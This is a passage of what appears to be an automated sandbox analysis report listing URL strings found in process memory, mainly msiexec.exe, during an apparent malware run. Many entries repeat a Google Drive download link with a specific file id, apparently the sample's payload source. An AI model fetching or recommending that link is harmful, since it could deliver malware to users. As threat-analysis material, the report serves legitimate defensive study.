      Source: powershell.exe, 00000001.00000002.1666170853.0000000004E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
      Source: powershell.exe, 00000001.00000002.1666170853.0000000004F85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: msiexec.exe, 0000000A.00000003.1942442210.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034300080.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230355519.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230463189.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304198126.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2383990393.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230463189.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2136395251.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1788007854.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304464046.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2167527111.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304464046.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1756685959.0000000000B66000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1818594292.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1848304830.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1909807452.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2349609914.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1879994330.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2261119586.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1973398417.0000000000B25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: powershell.exe, 00000001.00000002.1669114987.0000000005E9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000001.00000002.1669114987.0000000005E9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000001.00000002.1669114987.0000000005E9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: msiexec.exe, 0000000A.00000003.2200809082.0000000000B27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dhttps://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=d
      Source: msiexec.exe, 0000000A.00000003.2003808510.0000000000B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: msiexec.exe, 0000000A.00000002.2414604219.0000000000A9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download
      Source: msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/U
      Source: msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/f
      Source: msiexec.exe, 0000000A.00000003.2349387502.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2383919487.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2200809082.0000000000B27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/rcontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=do
      Source: msiexec.exe, 0000000A.00000003.2261119586.0000000000B24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/s
      Source: msiexec.exe, 0000000A.00000003.1973369262.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1942442210.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034300080.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230355519.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304198126.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2136395251.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2167527111.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1818594292.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1848304830.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1909807452.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1879994330.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414604219.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1973398417.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2349387502.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2076406086.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2428406383.0000000021D30000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414213807.000000000075A000.00000004.00000010.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2383919487.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2200809082.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2261119586.0000000000B24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27
      Source: msiexec.exe, 0000000A.00000003.2200809082.0000000000B27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27IE5OsArQ9wgoR27
      Source: msiexec.exe, 0000000A.00000003.2304198126.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2349387502.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2383919487.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2261119586.0000000000B24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27IE5OsArQ9wgoR277
      Source: msiexec.exe, 0000000A.00000003.1973369262.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1942442210.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034300080.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230355519.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2136395251.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2167527111.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1909807452.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1879994330.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1973398417.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2349387502.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2383919487.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2200809082.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034328553.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2003808510.0000000000B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27IE5OsArQ9wgoR27y
      Source: msiexec.exe, 0000000A.00000003.2230355519.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2136395251.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2167527111.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2076406086.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2200809082.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2261119586.0000000000B24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27ndows
      Source: msiexec.exe, 0000000A.00000003.1973369262.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1942442210.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034300080.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230355519.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304198126.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2136395251.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1788007854.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2167527111.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1818594292.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1848304830.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1909807452.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1879994330.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1973398417.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2349387502.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2076406086.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2383919487.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2200809082.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2261119586.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034328553.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2003808510.0000000000B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: msiexec.exe, 0000000A.00000003.1973369262.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1942442210.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034300080.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230355519.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304198126.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2136395251.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1788007854.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2167527111.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1818594292.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1848304830.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1909807452.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1879994330.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1973398417.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2349387502.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2076406086.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2383919487.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2200809082.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2261119586.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034328553.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2003808510.0000000000B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/do0
      Source: msiexec.exe, 0000000A.00000003.2003808510.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414604219.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2261229044.0000000000B68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download
      Source: msiexec.exe, 0000000A.00000002.2414604219.0000000000A9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download#
      Source: msiexec.exe, 0000000A.00000003.2034300080.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034328553.0000000000B25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download(
      Source: msiexec.exe, 0000000A.00000002.2414604219.0000000000A9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download1
      Source: msiexec.exe, 0000000A.00000003.2034300080.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2136395251.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2167527111.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2076406086.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034328553.0000000000B25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download9
      Source: msiexec.exe, 0000000A.00000002.2414604219.0000000000A9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download?
      Source: msiexec.exe, 0000000A.00000003.1973369262.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034300080.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1973398417.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034328553.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2003808510.0000000000B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=downloadU
      Source: msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2383919487.0000000000B24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=downloadi
      Source: msiexec.exe, 0000000A.00000003.1973369262.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1942442210.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034300080.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230355519.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304198126.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2136395251.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1788007854.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2167527111.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1818594292.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1848304830.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1909807452.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1879994330.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1973398417.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2349387502.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2076406086.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2383919487.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2200809082.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2261119586.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034328553.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2003808510.0000000000B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/k
      Source: svchost.exe, 00000003.00000003.1205213974.0000017F884C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
      Source: edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
      Source: edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
      Source: edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
      Source: svchost.exe, 00000003.00000003.1205213974.0000017F884C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
      Source: powershell.exe, 00000001.00000002.1666170853.0000000004F85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000001.00000002.1669114987.0000000005E9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: svchost.exe, 00000003.00000003.1205213974.0000017F884C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
      Source: edb.log.3.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
      Source: msiexec.exe, 0000000A.00000003.1942442210.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034300080.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230355519.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230463189.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304198126.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2383990393.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230463189.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2136395251.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1788007854.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304464046.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2167527111.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304464046.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1756685959.0000000000B66000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1818594292.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1848304830.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1909807452.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2349609914.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1879994330.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2261119586.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1973398417.0000000000B25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: msiexec.exe, 0000000A.00000003.1942442210.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034300080.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230355519.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230463189.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304198126.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2383990393.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230463189.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2136395251.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1788007854.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304464046.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2167527111.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304464046.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1756685959.0000000000B66000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1818594292.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1848304830.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1909807452.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2349609914.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1879994330.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2261119586.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1973398417.0000000000B25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: msiexec.exe, 0000000A.00000003.1942442210.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034300080.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230355519.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230463189.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304198126.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2383990393.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230463189.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2136395251.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1788007854.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304464046.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2167527111.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304464046.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1756685959.0000000000B66000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1818594292.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1848304830.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1909807452.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2349609914.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1879994330.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2261119586.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1973398417.0000000000B25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: msiexec.exe, 0000000A.00000003.1942442210.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034300080.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230355519.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230463189.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304198126.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2383990393.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230463189.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2136395251.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1788007854.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304464046.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2167527111.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304464046.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1756685959.0000000000B66000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1818594292.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1848304830.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 